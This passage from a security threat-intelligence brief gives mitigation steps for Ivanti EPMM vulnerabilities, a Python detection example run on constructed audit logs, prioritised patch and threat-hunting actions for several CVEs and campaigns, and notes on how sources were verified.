- Patch now — upgrade to EPMM 12.6.1.1, 12.7.0.1, or 12.8.0.1 before 2026-05-10. Ivanti provides an in-place upgrade path; no configuration migration is required.
- Network isolation (if patching is delayed) — remove TCP 443 on the EPMM admin interface from internet exposure immediately. Place it behind VPN with allowlisted management-network source IPs.
- Audit Sentry registrations — in the EPMM admin console, review the registered Sentry host list. Revoke any unexpected entries. If suspicious entries are found, rotate the internal EPMM CA (this revokes all existing device certificates and requires re-enrolment — a significant operational step, but necessary if compromise is suspected).
- Audit enrolled device certificates — compare current enrolled device list against your asset inventory baseline. Anomalous device enrolments (unknown device ID, unusual user, unexpected enrolment date) may indicate post-exploitation persistence.
- MDM quarantine isolation — if active compromise is confirmed or strongly suspected, push an MDM quarantine compliance policy to all enrolled devices before beginning forensic investigation, to prevent attacker MDM-to-device lateral movement during the response window.
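The first detection opportunity listed above (unexpected Sentry registrations) and the device-enrolment audit step both reduce to comparing log and enrolment data against an inventory baseline. The block below is an added example, not Ivanti's tooling: the audit line format, the field names, the Sentry inventory and the device records are all constructed and do not reflect EPMM's actual log schema.

```python
"""Detection helpers: flag Sentry registration events whose host_id is not
in the appliance inventory or whose source is outside the Sentry network,
correlate follow-on admin activity by those principals, and diff enrolled
devices against an asset baseline. Added example with a constructed log
format; not Ivanti's real audit schema."""
import ipaddress
import re
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Set, Tuple

# Constructed inventory: known Sentry appliances and the subnet they live on.
SENTRY_INVENTORY = {"sentry-01": "10.50.0.11", "sentry-02": "10.50.0.12"}
SENTRY_NET = ipaddress.ip_network("10.50.0.0/24")

# Constructed audit lines (hypothetical key=value format).
SAMPLE_AUDIT = """\
2026-05-07T02:11:09Z event=SENTRY_REGISTER host_id=sentry-01 src=10.50.0.11 result=success
2026-05-07T03:40:52Z event=SENTRY_REGISTER host_id=sentry-99 src=203.0.113.45 result=success
2026-05-07T03:41:10Z event=ADMIN_API_CALL principal=sentry-99 src=203.0.113.45 result=success
2026-05-07T03:42:00Z event=SENTRY_REGISTER host_id=sentry-02 src=10.50.0.99 result=success
2026-05-07T04:00:00Z event=ADMIN_API_CALL principal=admin.jdoe src=10.10.1.5 result=success
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Dict[str, str]:
    fields = dict(KV_RE.findall(line))
    fields["ts"] = line.split(" ", 1)[0]
    return fields


@dataclass(frozen=True)
class RegistrationFinding:
    ts: str
    host_id: str
    src: str
    reasons: Tuple[str, ...]


def suspicious_registrations(audit_text: str, inventory=SENTRY_INVENTORY,
                             sentry_net=SENTRY_NET) -> List[RegistrationFinding]:
    """Successful registrations by unknown hosts, from the wrong address for a
    known host, or from outside the Sentry network."""
    findings = []
    for line in audit_text.splitlines():
        f = parse_line(line)
        if f.get("event") != "SENTRY_REGISTER" or f.get("result") != "success":
            continue
        host_id, src = f["host_id"], f["src"]
        reasons = []
        if host_id not in inventory:
            reasons.append("host_id not in Sentry inventory")
        elif inventory[host_id] != src:
            reasons.append("source differs from inventoried appliance address")
        if ipaddress.ip_address(src) not in sentry_net:
            reasons.append("source outside Sentry network")
        if reasons:
            findings.append(RegistrationFinding(f["ts"], host_id, src, tuple(reasons)))
    return findings


def admin_activity_by(audit_text: str, principals: Set[str]) -> List[Dict[str, str]]:
    """Admin API calls made under a principal that came from a suspicious
    registration: the second half of the chain, if it was used."""
    return [f for f in map(parse_line, audit_text.splitlines())
            if f.get("event") == "ADMIN_API_CALL" and f.get("principal") in principals]


def enrolment_anomalies(current, baseline: Set[str], disclosure_iso: str):
    """current: (device_id, user, enrolled_on ISO date). Flags devices absent
    from the asset baseline and any enrolment on or after the disclosure date."""
    disclosure = date.fromisoformat(disclosure_iso)
    out = []
    for device_id, user, enrolled_on in current:
        reasons = []
        if device_id not in baseline:
            reasons.append("device not in asset baseline")
        if date.fromisoformat(enrolled_on) >= disclosure:
            reasons.append("enrolled on or after disclosure date")
        if reasons:
            out.append((device_id, user, tuple(reasons)))
    return out


if __name__ == "__main__":
    regs = suspicious_registrations(SAMPLE_AUDIT)
    for r in regs:
        print(r)
    print(admin_activity_by(SAMPLE_AUDIT, {r.host_id for r in regs}))
    # Constructed enrolment records versus a constructed baseline.
    print(enrolment_anomalies([("dev-001", "alice", "2026-01-10"),
                               ("dev-777", "svc-unknown", "2026-05-07")],
                              {"dev-001", "dev-002"}, "2026-05-07"))
```

The correlation step matters more than either list alone: a registration from an unknown host that is followed by admin API activity under the same principal is the signature of the full chain, whereas a lone mismatched registration may be an appliance that was re-addressed without the inventory being updated.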
§ 8 — Action Items
Priority 1 — Act within 24 hours (CISA KEV deadlines breached or imminent)
| Action | Deadline | CVE | Mitigation if patch not possible |
|---|---|---|---|
| Confirm PAN-OS Captive Portal mitigation is applied | 2026-05-09 (today) | CVE-2026-0300 | Disable Captive Portal / restrict Authentication Portal to internal IPs |
| Patch Ivanti EPMM on-prem → 12.6.1.1 / 12.7.0.1 / 12.8.0.1 | 2026-05-10 | CVE-2026-5787 + CVE-2026-6973 | Remove EPMM admin port from internet; audit Sentry registrations |
| Apply April 2026 Windows Patch Tuesday on all domain hosts | 2026-05-12 | CVE-2026-32202 | Block outbound TCP 445 to internet; restrict NTLM via GPO |
Priority 2 — Patch within standard change window (≤ 72 hours)
| Action | Advisory / CVE | Details |
|---|---|---|
| Upgrade GLPI to ≥ 10.0.25 or ≥ 11.0.7 | CERTFR-2026-AVI-0551 | 7 CVEs: SSRF, XSS, auth-bypass, info-disclosure |
Priority 3 — Threat hunting and operational awareness
- APT28 / CVE-2026-32202: Hunt for outbound TCP 445 from workstations to internet IPs in SIEM/firewall logs; review authentication logs for unusual NTLM usage patterns
- MuddyWater / Teams BEC: Audit Microsoft Teams external-access settings; review recent external-user remote-session grants; hunt for Teams-initiated remote sessions followed by cloud service sign-ins from new IPs
- Amazon SES phishing: Review email gateway logs for high volumes of messages from Amazon SES IP ranges (`205.251.x.x`, `199.255.x.x`); verify no SES API keys are exposed in S3 buckets or public repositories
- Canvas / Instructure: Institutions using Canvas should document and assess GDPR Article 33/34 notification obligations; the May 12 extortion deadline creates a secondary breach-reporting trigger
- OT operators (water / energy): Review IT/OT network segmentation posture against Dragos findings (81% flat); confirm manual override procedures are documented and tested for all HMI-controlled processes
§ 9 — Verification Notes
Included — two or more independent sources verified:
- CVE-2026-5787 / CVE-2026-6973 (Ivanti EPMM): Ivanti blog + NVD + The Hacker News
- CVE-2026-32202 (Windows Shell): Microsoft MSRC + NVD (CISA KEV calendar confirmed)
- Die Linke / Qilin: Heise Online (primary German tech publication) + party victim statement
- Eurail breach: NOS Nieuws (Dutch public broadcaster) + Dutch DPA statement
Included — national CERT / authority single-source carve-out (Prime Directive 5):
- Polish ABW water OT advisory (ABW = national security agency advisory)
- CERT-FR CERTFR-2026-ACT-016 agentic AI advisory (France national CERT)
- GLPI CERTFR-2026-AVI-0551 (CERT-FR)
Included — single-source threat intelligence (elevated on source quality and operational relevance):
- MuddyWater Chaos ransomware false-flag campaign (Deep Instinct threat intelligence report; included given confirmed Iran-nexus TTP and European targeting; treat with standard single-source caution)
- Amazon SES BEC technique (Kaspersky Securelist, 2026-05-04; outside 72 h developing window, included as first coverage with age noted; treat with standard single-source caution)
Updates from prior coverage:
- CVE-2026-0300 (deep-dived 2026-05-07): update only; no re-brief of underlying vulnerability
- Canvas/Instructure (first covered 2026-05-06): update with confirmed scope expansion
Deferred — verification insufficient:
- IBM X-Force Annual Report 2026: publication date could not be independently verified; deferred to next issue
- CVE-2026-21509 / CVE-2026-21514 / CVE-2026-21513 (Office Protected View chain): CVE-2026-21509 confirmed as January 2026 KEV entry with deadline already passed (2026-02-16); not new content; excluded
- CallPhantom Android apps: India/APAC primary focus; insufficient Swiss/EU nexus
- ETTP Belgium / SafePay: single ransomware leak-site claim; no victim confirmation
- TCLBANKER: explicitly dropped in 2026-05-07 brief; no new development in window